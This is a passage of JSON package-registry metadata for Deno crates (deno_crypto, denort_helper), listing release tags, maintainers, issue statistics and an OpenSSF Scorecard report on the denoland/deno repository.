o/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-28T19:52:14.296Z","dependent_packages_count":21,"downloads":944971,"downloads_period":"total","dependent_repos_count":53,"rankings":{"downloads":4.2596470236314685,"dependent_repos_count":4.1929693343305905,"dependent_packages_count":1.9325008790896374,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":2.8697934868619583},"purl":"pkg:cargo/deno_crypto","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_crypto","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_crypto","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_crypto/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T02:34:50.351Z","issues_count":6619,"pull_requests_count":9639,"avg_time_to_close_issue":17209143.875658587,"avg_time_to_close_pull_request":1533351.1008099688,"issues_closed_count":3794,"pull_requests_closed_count":8024,"pull_request_authors_count":580,"issue_authors_count":2470,"avg_comments_per_issue":2.509442513974921,"avg_comments_per_pull_request":0.719680464778504,"merged_pull_requests_count":7006,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":663,"past_year_pull_requests_count":1197,"past_year_avg_time_to_close_issue":1426984.6098654708,"past_year_avg_time_to_close_pull_request":1334468.010687023,"past_year_issues_closed_count":223,"past_year_pull_requests_closed_count":655,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2428355957767723,"past_year_avg_comments_per_pull_request":1.1161236424394319,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":483,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1795,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":391,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:23.943Z","updated_at":"2022-11-07T18:29:23.943Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:27.208Z","updated_at":"2023-07-18T22:41:27.208Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11548938,"name":"denort_helper","ecosystem":"cargo","description":"Helpers for denort.","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":55,"first_release_published_at":"2025-04-16T21:44:20.977Z","latest_release_published_at":"2026-08-06T11:47:19.266Z","latest_release_number":"0.55.0","last_synced_at":"2026-08-29T21:56:54.493Z","created_at":"2025-04-16T21:46:20.361Z","updated_at":"2026-08-29T21:56:54.493Z","registry_url":"https://crates.io/crates/denort_helper/","install_command":"cargo install denort_helper","documentation_url":"https://docs.rs/denort_helper/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-14T18:00:32.000Z","size":246768,"stargazers_count":108238,"open_issues_count":1496,"forks_count":6339,"subscribers_count":1425,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.515Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-15T11:22:15.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using 